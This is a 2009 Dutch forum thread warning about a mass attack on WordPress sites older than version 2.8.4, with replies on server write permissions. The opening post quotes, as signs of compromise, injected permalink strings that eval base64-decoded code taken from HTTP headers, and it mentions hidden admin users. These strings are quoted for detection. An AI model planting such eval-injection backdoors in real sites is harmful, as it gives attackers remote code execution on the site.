Toon posts:

Grote Wordpress (< v2.8.4) hackaanval bezig.

Pagina: 1
Acties:
  • 1.105 views

zaterdag 5 september 2009 20:38

Acties:
  • 0 Henk 'm!

Verwijderd

Topicstarter
Sinds enkele uren, misschien dagen, is er een grote Wordpress aanval bezig. Met een snel tempo worden er velen Wordpress blogs/sites gehacked. Dit betreft tot nu toe alle versies ouder dan de laatste versie (2.8.4).
Het zou eventueel (uit onbevestigde berichten) kunnen zijn dat ook de laatste versie niet helemaal veilig is en dat er een nieuwe update komt.

Dus voor iedereen met een Wordpress site, hou het even goed in de gaten. En uiteraard direct upgraden naar de laatste versie, mocht je dat nog niet gedaan hebben.

Om te kunnen zien of je gehackt bent kun je dit controleren bij de permalinks. Deze zouden dan veranderd moeten zijn naar:
code:
1
2
3

    %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%

    &#8220;/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%


Ook kan er een hidden admin user zijn toegevoegd. Kijk bij users en let op of het aantal admin users ook het aantal admin users betreft als er daadwerkelijk zijn. Je kunt ook kijken in de database met phpmyadmin.

Meer info:
http://mashable.com/2009/09/05/wordpress-attack/
http://lorelle.wordpress....ss-versions-under-attack/

[ Voor 28% gewijzigd door Verwijderd op 05-09-2009 20:44 ]

zaterdag 5 september 2009 21:44

Acties:
  • 0 Henk 'm!
  • Sebazzz
  • Registratie: September 2006
  • Laatst online: 16-09 15:42

Sebazzz

3dp

Gelukkig heb ik bij het begin al Wordpress 2.8.4 gedraaid op me website. :)

[Te koop: 3D printers] [Website] Agile tools: [Return: retrospectives] [Pokertime: planning poker]

maandag 7 september 2009 03:43

Acties:
  • 0 Henk 'm!
  • _Thanatos_
  • Registratie: Januari 2001
  • Laatst online: 05-09 14:39

_Thanatos_

Ja, en kaal

Zoiets is toch onmogelijk als de webserver geen rechten heeft om in de wordpress-directory te schrijven? (dwz rechten op filesystem-niveau)

[ Voor 14% gewijzigd door _Thanatos_ op 07-09-2009 03:44 ]

日本!🎌

dinsdag 8 september 2009 08:37

Acties:
  • 0 Henk 'm!
  • Pin0
  • Registratie: November 2002
  • Niet online

Pin0

_Thanatos_ schreef op maandag 07 september 2009 @ 03:43:
Zoiets is toch onmogelijk als de webserver geen rechten heeft om in de wordpress-directory te schrijven? (dwz rechten op filesystem-niveau)
Bij de meeste cms-en kan je files uploaden ed. Dan is er sowieso een directorie schrijfbaar voor de webserver.

Mijn Lego Mocs - LEGO idea: The Motorcycle Garage

woensdag 9 september 2009 19:35

Acties:
  • 0 Henk 'm!
  • _Thanatos_
  • Registratie: Januari 2001
  • Laatst online: 05-09 14:39

_Thanatos_

Ja, en kaal

Als die files in een database komen, heb je geen schrijfbare map nodig ;)

日本!🎌

woensdag 9 september 2009 19:39

Acties:
  • 0 Henk 'm!
  • Voutloos
  • Registratie: Januari 2002
  • Niet online

Voutloos

_Thanatos_ schreef op woensdag 09 september 2009 @ 19:35:
Als die files in een database komen, heb je geen schrijfbare map nodig ;)
En als je dan een fuckup maakt dat iemand in de DB kan schrijven ben je net zo hard de sjaak. Je vervangt nu het ene systeem dat beveiligd moet worden voor het andere, maar het kan allebei net zo fout gaan. :z

{signature}

zaterdag 12 september 2009 19:54

Acties:
  • 0 Henk 'm!
  • JeroenH
  • Registratie: Januari 2003
  • Laatst online: 19:43

JeroenH

Niet helemaal ontopic, maar het lijkt me niet nodig hier een speciaal topic voor te openen. En ik hoop dat hier wat Wordpress experts zitten.

Ik heb een probleem met mijn Wordpress website (deze) wat ik niet kan verklaren. Het gaat om deze specifieke pagina: klik. Zoals je ziet staat daar een lijst van WSC teams. Zodra ik echter één (of meerdere) rijen toe voeg wordt een lege pagina weegegeven (wel de normale banner bovenaan en de widgets rechts, maar niet meer de tabel met teams). Het is erg frustrerend want ik heb geen programmeer kennis, dat is ook de reden dat ik voor een 'kant-en-klaar-systeem' als Wordpress gekozen heb.

Ik snap er helemaal niks van. Heeft iemand een idee wat dit zou kunnen zijn en belangrijker nog: wat ik kan doen om het op te lossen?

WP is geüpdate - het probleem was er ook met de vorige versie - en het heeft ook niets te maken met mijn multilingual plugin, want als ik die uitschakel kan ik het probleem op dezelfde wijze reproduceren.

Xtool D1 10w laser cutter - IoT moet nooit op internet - 3x HomeWizard plug-in batterij, totaal 8,1 kWh / 2400 watt / 2400 watt, aansturing met Home Assistant

zaterdag 12 september 2009 20:21

Acties:
  • 0 Henk 'm!
  • RobIII
  • Registratie: December 2001
  • Niet online

RobIII

Admin Devschuur®

^ Romeinse Ⅲ ja!

(overleden)
JeroenH schreef op zaterdag 12 september 2009 @ 19:54:
Niet helemaal ontopic, maar het lijkt me niet nodig hier een speciaal topic voor te openen. En ik hoop dat hier wat Wordpress experts zitten.
Behalve dat het topic al niet in WEB hoort (Waar hoort mijn topic?) zie ik al helemaal niet wat jouw post dan weer in dit topic doet want behalve het woordje "Wordpress" heeft het niets gemeen met elkaar.

Open gerust een nieuw topic, maar lees voordat je dat doet eerst onze Quickstart door want met de informatie die je nu verschaft komen we nergens.

There are only two hard problems in distributed systems: 2. Exactly-once delivery 1. Guaranteed order of messages 2. Exactly-once delivery.

Je eigen tweaker.me redirect

Over mij

Pagina: 1

Dit topic is gesloten.

Apple iPhone 16e LG OLED evo G5 Google Pixel 10 Samsung Galaxy S25 Star Wars: Outlaws Nintendo Switch 2 Apple AirPods Pro (2e generatie) Sony PlayStation 5 Pro

Tweakers is onderdeel van DPG Media B.V.
Alle rechten voorbehouden - Auteursrecht © 1998 - 2025 Hosting door TrueFullstaq